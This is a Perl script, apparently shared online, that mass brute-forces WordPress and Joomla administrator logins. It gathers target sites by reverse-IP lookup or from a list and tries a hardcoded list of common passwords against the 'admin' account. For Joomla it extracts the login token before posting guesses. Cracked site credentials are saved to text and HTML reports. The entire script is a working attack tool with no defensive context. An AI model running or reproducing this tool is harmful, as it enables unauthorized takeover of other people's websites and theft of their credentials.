Wordpress Joomla Cracker

1. #!/usr/bin/perl -X
2. ##########################################################################################
3. # Wordpress & Joomla Bruter v.1.0                                                        #
4. # Coded by B47CHGURU on 16-08-2011  for his brother Kishan Patel!!                       #
5. # Updated on 17-08-2011                                                                  #
6. #if any bugs are found ...plz do inform me at interestingpal@gmail.com                   #
7. #reverse ip tool incorporated wont extract all websites.. use yougetsignal.com           #
8. #Note: You should first install HTML::LinkExtor module with CPAN shell                   #
9. #----------------------------------------------------------------------------------------#
10. #To all script kiddies..... changing the "made by" headers wont make you the coder...!!  #
11. #Respect the coderz..!!!                                                                 #
12. ##########################################################################################
13.  
14.  
15.  
16.  
17. if($^O =~ /Win/){
18.  
19.    system("cls");
20.  
21. }else{
22.  
23.    system("clear");
24. }
25.  print ("\n#######################################################\n");
26.  
27.  print ("    Fuerza Bruta\n");
28.  
29.  print ("########################################################\n\n\n");
30.     use warnings;
31.     use LWP::UserAgent;
32.     use HTML::LinkExtor;
33.     use URI::URL;
34.     use HTTP::Request;
35.     use HTTP::Request::Common qw(POST);
36.     use HTTP::Request::Common qw(GET);
37.     use HTTP::Cookies;
38.       $ua = LWP::UserAgent->new(keep_alive => 1);
39. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
40. $ua->timeout (20);
41. $ua->cookie_jar(
42.         HTTP::Cookies->new(
43.             file => 'mycookies.txt',
44.             autosave => 1
45.         )
46.     );
47.    
48. my  $i = 1;
49. my  $count = 0;
50. my  $vul = 0;
51. my  $incount = 0;
52. $asd = 'wp-submit';
53.     $data='wandjbruter.html';
54.     $admin='admin';
55. $indicator = 'b';
56.  open (CHECKR, "<$data");
57.  
58. @CHECKED = <CHECKR>;
59. close CHECKR;
60. foreach $Post(@CHECKED) {
61. if ($Post=~/Bruter/){
62. $indicator = 'a';
63. } else {
64. }
65. }
66.  
67. open HTML, ">>", "wandjbruter.html" or die $!;
68. if ($indicator=~/b/){
69. print HTML "<html xmlns=\"http://www.w3.org/1999/xhtml\"> \n <head> \n <title>B47CH GURU's Wordpress & Joomla Bruter v.1.0..!!</title> \n  </head>";
70. print HTML "<body id=\"#body\" body bgcolor=\"#000000\" text=\"#FFFFFF\" link=\"#FF3333\" vlink=\"#C0C0C0\" alink=\"#990000\" marginwidth=\"100\" align=\"left\"> \n";
71. print HTML "<br /> \n <center>\n <h1><u>B47CH GURU's Wordpress & Joomla Bruter v.1.0..!!</u></h1> \n <h2><u>####Scan results####</u></h2> \n ";
72. } else {
73. print HTML "<html xmlns=\"http://www.w3.org/1999/xhtml\"> \n <head> \n <title>B47CH GURU's Wordpress & Joomla Bruter v.1.0..!!</title> \n  </head>";
74. print HTML "<body id=\"#body\" body bgcolor=\"#000000\" text=\"#FFFFFF\" link=\"#FF3333\" vlink=\"#C0C0C0\" alink=\"#990000\" marginwidth=\"100\" align=\"left\"> \n";
75. print HTML "<br /> \n <center>\n ";
76. }
77. my @imgs = ();
78.   sub reverse {
79.      my($tag, %attr) = @_;
80.      return if $tag ne 'a';
81.      push(@TARGETS, values %attr);
82.   }
83. print " Quieres realizar un ReverseIP o cargar sitios desde una lista..?(s/n)>";
84. my $revlist=<STDIN>;
85. if($revlist =~ /y/){
86. print "\n IP/Sitio a aplicar ReverseIP..\? >";
87. my $website=<STDIN>;
88. chomp($website);
89. my $linds = 'http://sameip.org/ip/' . $website;
90. print (" \n ############################################## \n");
91. $url = $linds;
92.   $p = HTML::LinkExtor->new(\&reverse);
93.  
94.  
95.   $res = $ua->request(HTTP::Request->new(GET => $url),
96.                       sub {$p->parse($_[0])});
97.  
98.  
99.   my $base = $res->base;
100.   @TARGETS = map { $_ = url($_, $base)->abs; } @TARGETS;
101.   sort(@TARGETS);
102.   splice (@TARGETS, 0, 1);
103.   $asshole =$TARGETS[-1];
104.   print (" \n $asshole \n\n");
105.   if($asshole =~/nameserverspy/ | $asshole =~ /dailydomains/ | $asshole =~ /sameip/){
106.   splice (@TARGETS, -6, 6);
107.   }
108.   print join("\n", @TARGETS), "\n";
109.   print (" \n ############################################## \n\n");
110.   $linkno=$#TARGETS + 1;
111. goto loop2;
112. } else {
113. }
114.    
115.    
116.    
117.    
118.  
119.   print " Indica el Path de tu lista de sitios. >";
120. my $list=<STDIN>;
121. chomp($list);
122.   open (THETARGET, "<$list") || die "[-] No se puede abrir la lista !";
123. @TARGETS = <THETARGET>;
124. close THETARGET;
125. $linkno=$#TARGETS + 1;
126.    
127.    
128.    
129.     @PASSWORDS = ("qwerty","pass","123456","admin","password","pass123","123123","admin123","123456789","test","passwd","demo","Admin","abc123","test123","123456789");
130.    
131. loop2: foreach $linds(@TARGETS){
132.  
133. @imgs = ();
134. print ("\n");
135. print ("\n");
136. print join("\n", @imgs), "\n";
137. $incount = 0;
138.   chomp($linds);
139.  
140. $thelind = $linds;
141. $thelind = clear($thelind);
142. $thelind = trim($thelind);
143. $url = $thelind;
144.  
145. $linkdo=$#imgs + 1;
146. $redirect = $url . '/wp-admin/';
147. $wp = $url . '/wp-login.php';
148. $joom = $url . '/administrator/index.php';
149. print("\n ------------------------------------------ \n   Bruteando $url   \n ------------------------------------------ \n");
150.  
151.  
152. ##########################################Wordpress Bruting##################################################
153.  foreach $pass(@PASSWORDS){
154.  $dollar = 0;
155. chomp($pass);
156. $res = 0;
157.  my $req = POST $wp, [log => $admin, pwd => $pass, $asd => 'Log In', redirect_to => $redirect, testcookie => '1' ];
158.  
159.     my $res = $ua->request($req);
160.    
161.     if ($res->is_success) {
162.     $asshole = $res->status_line;
163.     $dollar = $res->content;
164.    
165.        
166.     } else {
167.     $asshole = $res->status_line;
168. print ("\n $asshole \n");
169.        
170.     }
171.     if ($asshole =~ /302/){
172.  
173.     print ("\n\n\n Sitio Crackeado $url Usuario $admin & password $pass \n\n\n");
174.     open OUTFILE, ">>", "wandjbruter.txt" or die $!;
175.         print OUTFILE "$url : $pass \n";
176.         print HTML "\t\t\n<tr><td><a href=\"$wp\"><font color=\"#66FF66\"><strong>$url</strong></a>  cracked with Username: <font color=\"red\">$admin</font> and Password: <font color=\"red\">$pass</font> </font>\n </br> \n </br> \n";
177.         close OUTFILE;
178.         next loop2;
179.     }
180.     if ($asshole =~ /404/){
181.     print("$url No corresponde a Wordpress \n\n");
182.     joomla();
183.     next loop2;
184.     };
185. }
186. if ($dollar =~ /Joomla/){
187. joomla();
188. next loop2;
189. }
190. $dollar = 0;
191. @imgs = ();
192.  
193. $incount = 0
194. }
195.  
196. ##########################################Joomla Bruting##################################################
197. sub joomla{
198. loop: foreach $rass(@PASSWORDS){
199. chomp($rass);
200.  
201.  
202.  
203. my $red = GET $joom;
204.  
205.    
206.     my $ret = $ua->request($red);
207.  
208.    
209.     if ($ret->is_success) {
210.     print("\n $url Pertenece a Joomla..!! \n");
211.         $asshole =  $ret->content;
212.         $dogy = $ret->status_line;
213.     } else {
214.         $assholed = $ret->status_line;
215.         next loop2;
216.     }
217.     $assholed = $ret->status_line;
218.     if ($assholed =~ /404/){
219.     print("$url not a Joomla site \n\n");
220.     next loop2;
221.     };
222.     $asdf = '<input type="hidden" name="task" value="login" />';
223.     while ($asshole =~ m/$asdf/g){
224.     $asdf = (pos($asshole) - length($1));
225.     }
226.    
227.     $asdf = $asdf + 29;
228.     $ass = substr ($asshole, $asdf, 32);
229.    
230.     my $rreq = POST $joom, [username => $admin, passwd => $rass, lang => 'en-GB', option => 'com_login', task => 'login', $ass => '1' ];
231.  
232.    
233.     my $rpiq = $ua->request($rreq);
234.     if ($rpiq->is_success) {
235.     $assholed = $rpiq->status_line;
236.    
237.     $assholeer =  $rpiq->content;
238.    
239.     $assholed = $rpiq->status_line;
240. }
241.  
242. $assholed = $rpiq->status_line;
243. if ($assholed =~ /303/ | $assholed =~ /301/){
244.     print ("\n\n\n Joomla website $url crackeado con usuario $admin & password $rass \n\n\n");
245.     open OUTFILE, ">>", "wandjbruter.txt" or die $!;
246.         print OUTFILE "$url : $rass \n";
247.         print HTML "\t\t\n<tr><td><a href=\"$joom\"><font color=\"#66FF66\"><strong>$url</strong></a>  cracked with Username: <font color=\"red\">$admin</font> and Password: <font color=\"red\">$rass</font> </font> \n </br> \n </br> \n";
248.         close OUTFILE;
249.         next loop2;
250.     }
251.  
252.  
253. }
254.  
255.  
256. }
257.  
258.  
259. sub clear{
260.  
261.    $website = shift;
262.  
263.    if($website !~ /^http/){
264.  
265.       $website = 'http://www.' . $website;
266.  
267.    }
268.  
269.    
270.  
271.    return $website;
272.  
273. }
274.  
275. sub trim{
276.   $string = shift;
277.   $string =~ s/^\s+//;            
278.   $string =~ s/\s+$//;
279.   return $string;        
280. }
281. print ("\n\n Todos los sitios han sido escaneados $linkno websites. Puedes ver los resultados en: 'wandjbruter.html'.\n");
282. print HTML "\n </center>\n </body> \n </html>";
283. close HTML;
284.  
285. if($^O =~ /Win/){
286.  
287.    system('.\wandjbruter.html');
288.  
289. }else{
290.  
291.    system('./wandjbruter.html');
292.  
293. }